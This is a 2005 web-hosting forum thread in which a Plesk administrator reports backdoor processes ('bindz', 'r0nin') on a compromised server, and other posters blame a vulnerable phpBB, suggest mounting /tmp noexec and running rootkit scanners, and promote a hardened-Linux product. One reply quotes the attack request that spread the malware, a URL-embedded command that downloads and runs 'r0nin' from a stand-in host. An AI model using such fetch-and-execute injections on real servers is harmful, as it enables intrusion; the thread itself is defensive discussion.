1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice
  2. Dear Pleskians, please read this carefully! New attachments and other rules Thank you!
    Dismiss Notice
  3. Dear Pleskians, I really hope that you will share your opinion in this Special topic for chatter about Plesk in the Clouds. Thank you!
    Dismiss Notice

Server hacked, but always was updated PLESK 7.5.3

Discussion in 'Plesk for Linux - 8.x and Older' started by graffix, May 26, 2005.

  1. graffix

    graffix Guest

    0
     
    Hello,

    we´re very angry about this, and we found no security problem on our server.

    We added for a client a new domain and see, that the httpd doesn´t start.

    We logged into the server and see that 443 is already running.

    Now we see under ps -axu these two services:

    ./bindz
    &
    ./r0nin

    We killed them and httpd is starting normally

    But why comes these two service on the updated machine?

    We use RedHat FC2 yum ist up to date, so we doesn´t see the security problem!

    Can anybody help us to resolve this problem? We opened a ticket to sw-soft, but no answer at this time!

    Thanks for the help.
     
  2. Griffith

    Griffith Guest

    0
     
    This is probably not a plesk issue, rather a security issue on your server... check that you have mod_security, firewall etc .. many posts about this in the forums...
     
  3. tandberg

    tandberg Guest

    0
     
    the processes you mention are mostly installed via phpBB, postNuke etc.
    If you have rootkits etc. on the server, the best solution is to do a clean reinstall as many binaries can be affected opening backdoors.
    After a clean install remount your /tmp dir nonexec, remove gcc and wget from the server.
    Have a look on the existing httpdirs for phpBB and postNuke and update asap.
     
  4. graffix

    graffix Guest

    0
     
    Thanks for the replays, but i think it is always a lot of a plesk problem: execution rights on /temp is very risky?!

    The same issue has confixx. Other Panels has not same problem.

    So my luck was, the wget was renamed on this server, so no other files was loaded on the server.

    I run chkrootkit to see if more is infected.
     
  5. tandberg

    tandberg Guest

    0
     
    Just have a look how the "tools" are spreading ..

    http://www.to.be.infected.pc/test.gif?&cmd=cd /;cd tmp;mkdir%...
    %20.x;wget%20www.havingworm.pc/worm/r0nin;chmod%20777%20r0nin;./r0nin

    making /tmp nonexec would leave the bin in /tmp but not executed. Never compile chkrootkit on an infected system. Build it elsewere then check with the static compiled version. :)
    Again, this is not a plesk issue - thats a php problem. ;)
     
  6. jshanley

    jshanley Guest

    0
     
    It's not technically a Plesk issue, but plesk does distribute a vulnerable (hackable) version of phpBB in their Application Vault, right? I don't think they've updated the application to a non-vulnerable version. So I think if you use the Application Vault version of phpBB, you will get hacked again.
     
  7. atomicturtle

    atomicturtle Golden Pleskian

    29
     
    Joined:
    Nov 20, 2002
    Messages:
    2,110
    Likes Received:
    7
    Location:
    Washington, DC
    Some real lightwieght forensics here, before killing the process, look to see what user it is running as (ps aux). If it is running as apache, its most likely an exploitable php app. If its running as some other user, probably an exploitable cgi-bin app, and if its running as root, it was probably an exploitable service.

    I've got rpm's for chkrootkit, and rkhunter in my archive, and in addition I've been developing a security suite targetted at securing hosting servers called Atomic Secured Linux (ASL). That project includes both a kernel hardened specifically for security, and an intrusion detection/response layer with mod_security and mod_dosevasive. We also currently maintain the largest signature database for mod_security (well over a thousand signatures at this date)
     
  8. graffix

    graffix Guest

    0
     
    Thanks for the answers ...
    it´s very difficult to find, what customer/clients
    php programm has an vulnerable.

    We moved the backdoor programms to secure home dir.

    But why did all php programs use the /temp instead of /home/httpd/vhosts/phptemp and run in only user rights instead of apache?

    Whatever, we must search for a good way to secure our server.

    Using Virtuozzo is more stable? The kernel here is not overloaded and smaller, but the build? very old 2.4xx

    Have someone a good idea?

    Thanks
     
  9. Cranky

    Cranky Guest

    0
     
    2.4.xx kernels are fine if you're running Virtuozzo ... the latest Virtuozzo kernel for VZ 2.6.1 is 2.4.20-021stab028.12.777, a 2.6.x kernel is due later in the year.

    You need to make sure you're running a firewall, try mod_security to tighten up security and rkhunter, chkrootkit as suggested and you might find if you've been rooted.

    Your best bet if you're running the Virtuozzo node would be to create another VE and copy the plesk data across from your existing VE to ensure you're running safe binaries. Alternatively you could just create a new VE and copy the binaries from that to your existing server. MAKE BACKUPS FIRST
     
  10. BoXie

    BoXie Guest

    0
     
    I had this exact same process running some time ago : 'r0nin' .

    It was a phpBB exploit and had some garbage in /tmp also.

    No more phpBB on my servers !! Last week another phpBB expoit came in .. on the previous version of phpBB.

    phpBB is as leak as a fishing net. (That is how we dutch people would say that ;)
     
  11. smtalk

    smtalk Guest

    0
     
    Just secure your /tmp
     
  12. BoXie

    BoXie Guest

    0
     
    Is there a way to secure /tmp if it isn't mounted ? But just a directory ?
     
  13. Griffith

    Griffith Guest

    0
     
    even though you secure /tmp they can still run .pl files etc.. (correct me if i'm wrong)
     
  14. atomicturtle

    atomicturtle Golden Pleskian

    29
     
    Joined:
    Nov 20, 2002
    Messages:
    2,110
    Likes Received:
    7
    Location:
    Washington, DC
    /tmp isnt really enough, the badguys can run their exploits from any directory writable by the webserver. I see them running in the users httpdocs these days as often as I see then running from /tmp or /var/tmp. Here are a few examples of what ASL has caught:


    From 172.150.XX.XXX: denied untrusted exec of /var/tmp/za/zero by /bin/bash[sh:2905] uid/euid:48/48 gid/egid:48/48, parent /bin/bash[sh:32502] uid/euid:48/48 gid/eg8

    attacker trying to run /var/tmp/za that they've uploaded and tried to run as apache (48/48)

    heres another system where theyre running it from the users directory:
    From 83.91.XX.XX denied untrusted exec of /home/httpd/vhosts/DOMAIN.COM/httpdocs/albums/DOMAIN/img/.htaccess/.kiki/y2kupdate by /bin/bash[sh:20555] uid/euid:48/48 gid/egid:48/48

    This time the attacker shifted the exploit to a writable home directory, as /tmp was mounted noexec. Side note on this one, the app exploited was 100% custom code, so this wasn't your standard canned phpBB attack.

    In both cases however, the attack didn't work (although the applications were still exploitable) since ASL treats apache as an untrusted user, and will only let it execute apps owned by root. Its a simple way to in essence make the whole system noexec, but without the collatoral damage that would cause otherwise.
     
  15. Griffith

    Griffith Guest

    0
     
    Is it possible to get more info about asl?
     
  16. atomicturtle

    atomicturtle Golden Pleskian

    29
     
    Joined:
    Nov 20, 2002
    Messages:
    2,110
    Likes Received:
    7
    Location:
    Washington, DC
  17. BoXie

    BoXie Guest

    0
     
    I'm not a real Linux guru .. but isn't ASL a little bit like SELinux ?
     
  18. atomicturtle

    atomicturtle Golden Pleskian

    29
     
    Joined:
    Nov 20, 2002
    Messages:
    2,110
    Likes Received:
    7
    Location:
    Washington, DC
    Yes, SELinux is a subset of what is available in ASL with 2.6 kernels. In addition to that, ASL includes more kernel based hardening with grsec/PaX, and userspace intrusion detection/response with mod_security and mod_dosevasive. We currently maintain the largest archive of mod_security signatures (well over 1000 now) through our security portal at gotroot.com.

    The idea is to to approach this with a security-in-depth model, TPE (trusted path execution), RBAC (grsec and selinux), IDS (mod_security/mod_dosevasive), PaX (grsec), etc, all support each other. If an attacker can defeat one component, there are other pieces in the system to catch those failures.
     
  19. jshanley

    jshanley Guest

    0
     
    A+

    In short, Atomic is trying to save admins the time and work involved in setting up a much more hardened Linux environment, from which they can run Plesk. In exchange, all he asks for is a couple bucks for the effort.

    If I ran Plesk on Linux, I'd seriously consider it - not because I can't do those things myself, but because it saves a lot of time and effort that could be spent elsewhere on the business.

    Anyway. I suppose I'm leaning dangerously close to "promotion" here, so I'll stop :p He definately knows what he's doing, though.
     
  20. Griffith

    Griffith Guest

    0
     
    Atomic: if I use the mod_security rules at gotroot.com, are there any "problems" since the rulefiles are big?
     
Loading...